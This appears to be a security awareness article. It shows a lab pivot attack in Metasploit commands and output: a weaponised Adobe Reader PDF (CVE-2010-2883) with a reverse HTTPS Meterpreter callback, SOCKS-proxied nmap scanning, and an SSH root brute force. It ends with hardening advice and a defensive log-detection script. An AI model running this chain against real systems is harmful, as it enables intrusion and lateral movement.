This article aims to raise awareness of the risk of a pivot attack, in which the target system is exploited through another, already compromised system. A defence based only on the company perimeter is of little use against this kind of attack, because the attack traffic originates inside the perimeter; it calls for new solutions and approaches.
Systems are generally compromised by a phishing attack that tricks the user into clicking a malicious URL or opening an infected document. The technique of attacking a server through another compromised system is called pivoting, and it is shown here with Metasploit, which is preinstalled in Kali Linux. Recent attacks have followed exactly this logic: https://www.us-cert.gov/ncas/alerts/TA17-117A.
The proposed example simulates a phishing attack that delivers a malicious PDF. Opening it gives the attacker control of the infected system, which is then used as a Trojan horse to attack a Linux server with an SSH brute-force.
The reference architecture is the following:
The systems involved in the laboratory are:
OS | Role | IP
Kali Linux | Attacker | 192.168.4.1
Windows 7 with Adobe Reader 9 | Client attacked directly; its second interface, 192.168.3.1, sits on the internal network | 192.168.4.3
CentOS 7.2 Linux | Back-end server attacked through the pivot | 192.168.3.4
Let's start by explaining how to organize the attack from Kali.
Metasploit in Kali
Kali Linux is used to attack the Windows client. The Metasploit Framework, preinstalled in Kali, is an exploitation tool that bundles a large collection of well-known exploits together with the shellcode they deliver, called payloads.
In this case a PDF file-format exploit that triggers CVE-2010-2883 is used. This is a stack-based buffer overflow in CoolType.dll in Adobe Reader and Acrobat 9.x before 9.4 and 8.x before 8.2.5 on Windows and Mac OS X, reached through a malformed SING table in an embedded TrueType font; it allows remote attackers to execute arbitrary code (https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2883).
To exploit this vulnerability I create a PDF file to send to the victim, a Windows 7 client with Adobe Reader 9 installed. The malicious PDF is generated with Metasploit as follows (the payload chosen here must be the same one the handler is later configured with):
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.4.1
LHOST => 192.168.4.1
msf exploit(adobe_cooltype_sing) > set LPORT 443
LPORT => 443
msf exploit(adobe_cooltype_sing) > show options
Module options (exploit/windows/fileformat/adobe_cooltype_sing):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
FILENAME  msf.pdf          yes       The file name.
Payload options (windows/meterpreter/reverse_https):
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
LHOST     192.168.4.1      yes       The local listener hostname
LPORT     443              yes       The local listener port
Exploit target:
Id  Name
--  ----
0   Automatic
msf exploit(adobe_cooltype_sing) > exploit
[*] Creating 'msf.pdf' file...
[+] msf.pdf stored at /root/.msf4/local/msf.pdf
The vulnerability is triggered when the PDF is opened. The payload opens a reverse HTTPS connection from the victim back to the attacker's machine and stages Meterpreter over it. Meterpreter is a DLL that is mapped straight into the address space of the Adobe Reader process and started in a new thread, a technique called Reflective DLL Injection: the DLL loads itself without going through the Windows loader, so it never touches the disk and does not appear in the process's module list. This defeats file-based antivirus scanning, although memory scanning and behavioural detection can still catch it.
For a deeper look at how Meterpreter works, I suggest reading this article: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads.
An exploit handler listens for the connections made by the shellcode triggered by the exploit. It must be configured with the same payload, LHOST and LPORT that were embedded in the PDF, otherwise the staging request from the victim is not understood:
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
Exploit target:
Id  Name
--  ----
0   Wildcard Target
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 192.168.4.1
LHOST => 192.168.4.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started HTTPS reverse handler on https://0.0.0.0:443/
[*] Starting the payload handler…
Now the PDF can be sent to the victim. When the user opens it, the handler receives and manages the connection and a Meterpreter session is created:
[*] 192.168.4.3:8372 Request received for /5VWz…
[*] 192.168.4.3:8372 Staging connection for target /5VWz received…
[*] Meterpreter session 1 opened (192.168.4.1:443 -> 192.168.4.3:8372) at 2017-05-01 23:06:42 +0200
meterpreter > sysinfo
Computer : Client
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : it_IT
Meterpreter : x86/win32
meterpreter >
The attacker has now taken control of the victim. The Meterpreter session runs with the privileges of the user who opened the PDF. If that user belongs to the Administrators group, the session still runs with a filtered token because of Admin Approval Mode (UAC), which stops software from silently installing without the administrator's consent. Full control of the system requires a privilege escalation, which is out of scope for this article. Note also, from the sysinfo output, that this is a 32-bit Meterpreter running under WOW64 on a 64-bit Windows, because Adobe Reader 9 is a 32-bit process; migrating to a 64-bit process is advisable before further post-exploitation.
To discover which internal network the client is attached to, it is enough to look at its ARP table from a shell:
meterpreter > shell
Process 836 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\sys0>arp -a
Interface: 192.168.3.1 --- 0x1e
Internet Address      Physical Address      Type
192.168.3.4           08-00-27-bf-85-85     dynamic
192.168.3.255         ff-ff-ff-ff-ff-ff     static
224.0.0.2             01-00-5e-00-00-02     static
224.0.0.22            01-00-5e-00-00-16     static
224.0.0.251           01-00-5e-00-00-fb     static
224.0.0.252           01-00-5e-00-00-fc     static
239.255.255.250       01-00-5e-7f-ff-fa     static
255.255.255.255       ff-ff-ff-ff-ff-ff     static
We have found a possible target, 192.168.3.4, on a second network (192.168.3.0/24) that the Windows client reaches through its own interface 192.168.3.1 and that is not directly routable from Kali. To detect the services running on it we need an nmap scan, and to do that the compromised Windows system must be used as a proxy. This type of attack is called a pivot.
To scan 192.168.3.4, a route to the 192.168.3.0/24 network is added in Metasploit. The route below tells Metasploit to send all traffic for 192.168.3.0/24 through Meterpreter session 1, so the Windows system works as a simple router. The route is internal to the framework: it applies to Metasploit modules only and does not touch the Kali kernel routing table.
meterpreter > background
[*] Backgrounding session 1…
msf exploit(handler) > route add 192.168.3.0 255.255.255.0 1
[*] Route added
msf exploit(handler) > route print
IPv4 Active Routing Table
=========================
Subnet       Netmask        Gateway
------       -------        -------
192.168.3.0  255.255.255.0  Session 1
[*] There are currently no IPv6 routes defined
The next step is to use proxychains (shipped with Kali; otherwise apt-get install proxychains), which forces the TCP connections of any program through an HTTP or SOCKS proxy. Its default configuration already points at 127.0.0.1:9050, the port Tor normally uses, so the SOCKS proxy is started inside Metasploit on that same port (make sure Tor is not running on it). Connections entering this proxy are forwarded over the Meterpreter route added above:
msf exploit(handler) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > set SRVPORT 9050
SRVPORT => 9050
msf auxiliary(socks4a) > run
[*] Auxiliary module execution completed
[*] Starting the socks4a proxy server
An nmap scan through proxychains detects the open ports on 192.168.3.4; proxychains is configured to send all traffic to the SOCKS proxy listening on port 9050. Only complete TCP connections can be relayed through a SOCKS proxy, so the scan must be a TCP connect scan (-sT): SYN scans, UDP and ICMP probes are sent with raw sockets and bypass proxychains entirely. For the same reason it is wise to add -Pn (skip host discovery, whose probes would not go through the pivot) and -n (no DNS lookups). In the output below, each "denied" line is a port for which the SOCKS server could not complete the connection over the pivot (closed or filtered), while "OK" marks an open port.
root@kali:~# cat /etc/proxychains.conf | grep socks4
socks4 127.0.0.1 9050
root@kali:~# proxychains nmap -sT 192.168.3.4
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.01 ( https://nmap.org ) at 2017-05-05 18:14 CEST
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:113-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:445-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:111-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:256-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:143-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:199-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:1720-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:1723-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:139-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:8888-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:25-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:993-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:135-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:23-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:22-<><>-OK
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:995-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:3306-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:21-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:1025-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:110-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:80-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:8080-<–denied
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:587-
The SSH port is open, and that is enough for an SSH brute-force attack with Metasploit's ssh_login module. The user/password list is one of the wordlists shipped with Kali. Because the route is active, the module's connections to 192.168.3.4 go through the Meterpreter session automatically, so from the Linux server's point of view the attempts come from the Windows client's internal address 192.168.3.1, not from Kali.
msf exploit(handler) > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > set RHOSTS 192.168.3.4
RHOSTS => 192.168.3.4
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > show options
Module options (auxiliary/scanner/ssh/ssh_login):
Name              Current Setting                                               Required  Description
----              ---------------                                               --------  -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS 192.168.3.4 yes The target address range or CIDR identifier
RPORT 22 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE false yes Whether to print output for all attempts
msf auxiliary(ssh_login) > exploit
[*] SSH - Starting bruteforce
[-] SSH - Failed: 'root:'
[-] SSH - Failed: 'root:!root'
[-] SSH - Failed: 'root:Cisco'
[-] SSH - Failed: 'root:NeXT'
[-] SSH - Failed: 'root:QNX'
[-] SSH - Failed: 'root:admin'
[+] SSH - Success: 'root:attack' 'uid=0(root) gid=0(root) groups=0(root) Linux linux.test.net 3.10.0-327.28.3.el7.x86_64 #1 SMP Thu Aug 18 19:05:49 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux '
[*] Command shell session 2 opened (?? -> 192.168.3.4:22) at 2017-05-02 15:41:00 +0200
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >
We found the root password of the Linux system. We can log in via SSH through proxychains, which sends the SSH connection to the same SOCKS proxy:
root@kali:~# more /etc/proxychains.conf | grep 9050
socks4 127.0.0.1 9050
root@kali:~# proxychains ssh root@192.168.3.4
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:9050-<><>-192.168.3.4:22-<><>-OK
root@192.168.3.4's password:
Last failed login: Tue May 2 20:31:17 CEST 2017 from 192.168.3.1 on ssh:notty
There were 34 failed login attempts since the last successful login.
Last login: Tue May 2 15:02:26 2017
[root@linux-01 ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@linux-01 ~]#
We have exploited the back-end Linux server. Note the login banner: the server records the failed attempts as coming from 192.168.3.1, the Windows client, and counted 34 of them since the last successful login, a clear trace of the brute force that nobody was watching. With this approach it is possible to scan and try to exploit every back-end system reachable from the first compromised Windows machine.
Conclusion
In this article I showed how it is possible to exploit internal company services from a compromised Windows system, itself compromised through the attack vector hackers love most: phishing campaigns.
It is very hard to prevent laptops and other company endpoints from being compromised, because nobody is immune to opening a malicious attachment of a plausible-looking mail or to visiting an infected site that appears clean. An up-to-date antivirus does not guarantee a good defence against modern attacks.
In this context all back-end servers must be kept at the latest releases and configured securely. In our example the SSH server was poorly configured: SSH root login must be disabled (PermitRootLogin no in sshd_config), password authentication should be replaced by key-based authentication, and fail2ban can be used to block SSH brute-force attempts at the source address. The pivot also shows the limit of perimeter defence: internal networks should be segmented and east-west traffic monitored, so that a compromised client cannot reach every back-end server.
I hope this helps system administrators become aware of advanced modern attacks and take the right countermeasures to minimise their impact.
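As an added example of the countermeasures just mentioned (this is not code from the article, from fail2ban or from OpenSSH), the following Python applies the fail2ban sshd-jail rule (ban a source after maxretry failures within findtime seconds, 5 and 600 by default) to a constructed /var/log/secure excerpt shaped like the attack above, flags a successful login that follows a brute force, and audits an sshd_config fragment for the settings that made the attack possible. The log lines, the two configuration fragments and the names `SAMPLE_SECURE_LOG`, `WEAK_SSHD_CONFIG` and `HARDENED_SSHD_CONFIG` are constructed for this example; the source address in the log is 192.168.3.1 because, through the pivot, the server never sees Kali.

```python
"""fail2ban-style detection of the SSH brute force as the CentOS server sees
it, plus an sshd_config audit (added example, not the article's own code; the
log lines and config fragments below are constructed)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed /var/log/secure excerpt. The source is 192.168.3.1, the Windows
# client's internal interface: through the pivot, Kali is never seen.
SAMPLE_SECURE_LOG = """\
May  2 15:38:10 linux-01 sshd[1900]: Failed password for sys0 from 192.168.3.7 port 51000 ssh2
May  2 15:40:51 linux-01 sshd[2210]: Failed password for root from 192.168.3.1 port 40412 ssh2
May  2 15:40:52 linux-01 sshd[2212]: Failed password for root from 192.168.3.1 port 40414 ssh2
May  2 15:40:53 linux-01 sshd[2214]: Failed password for root from 192.168.3.1 port 40416 ssh2
May  2 15:40:54 linux-01 sshd[2216]: Failed password for root from 192.168.3.1 port 40418 ssh2
May  2 15:40:55 linux-01 sshd[2218]: Failed password for invalid user admin from 192.168.3.1 port 40420 ssh2
May  2 15:41:00 linux-01 sshd[2222]: Accepted password for root from 192.168.3.1 port 40424 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")

def parse_sshd_lines(text, year=2017):
    """Turn sshd auth lines into events; syslog omits the year, so it is assumed."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append({"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]})
    return sorted(events, key=lambda e: e["ts"])

def find_bruteforce_sources(events, maxretry=5, findtime=600):
    """fail2ban sshd-jail rule: an IP is banned once it accumulates `maxretry`
    failures inside a sliding window of `findtime` seconds. Returns {ip: ban time}."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(list)
    bans = {}
    for e in events:
        if e["result"] != "Failed" or e["ip"] in bans:
            continue
        hist = recent[e["ip"]]
        hist.append(e["ts"])
        while hist and e["ts"] - hist[0] > window:   # expire failures outside the window
            hist.pop(0)
        if len(hist) >= maxretry:
            bans[e["ip"]] = e["ts"]
    return bans

def successful_after_bruteforce(events, maxretry=5, findtime=600):
    """Accepted logins from an IP after it crossed the ban threshold: the
    signal that the brute force worked and the account is now compromised."""
    bans = find_bruteforce_sources(events, maxretry, findtime)
    return [e for e in events
            if e["result"] == "Accepted" and e["ip"] in bans and e["ts"] >= bans[e["ip"]]]

# Constructed sshd_config fragments: the lab's weak setup and a corrected one.
WEAK_SSHD_CONFIG = "#PermitRootLogin yes\nPasswordAuthentication yes\n"
HARDENED_SSHD_CONFIG = "PermitRootLogin no\nPasswordAuthentication no\nMaxAuthTries 3\n"
SSHD_DEFAULTS = {"permitrootlogin": "yes", "passwordauthentication": "yes", "maxauthtries": "6"}

def effective_sshd_settings(text):
    """sshd honours the first uncommented occurrence of a keyword; anything
    unset (or present only as a comment) falls back to the OpenSSH default."""
    settings, seen = dict(SSHD_DEFAULTS), set()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition(" ")
        key = key.lower()
        if key in settings and key not in seen:
            settings[key] = value.strip().lower()
            seen.add(key)
    return settings

def audit_sshd_config(text):
    """Findings for the settings that made the article's brute force possible."""
    s = effective_sshd_settings(text)
    findings = []
    if s["permitrootlogin"] not in ("no", "prohibit-password", "without-password"):
        findings.append("PermitRootLogin is effectively yes: root can be brute-forced directly")
    if s["passwordauthentication"] == "yes":
        findings.append("PasswordAuthentication yes: wordlist attacks apply, prefer keys")
    if int(s["maxauthtries"]) > 3:
        findings.append(f"MaxAuthTries {s['maxauthtries']}: lower it to slow guessing per connection")
    return findings

if __name__ == "__main__":
    ev = parse_sshd_lines(SAMPLE_SECURE_LOG)
    print("would ban:", find_bruteforce_sources(ev))
    print("success after brute force:", successful_after_bruteforce(ev))
    print("weak config findings:", audit_sshd_config(WEAK_SSHD_CONFIG))
```

Two points this makes visible: a ban on 192.168.3.1 would have blocked the compromised client, which is the right outcome, and an "Accepted" from a source that has just been banned is the alert worth paging on, since it means the wordlist contained the password.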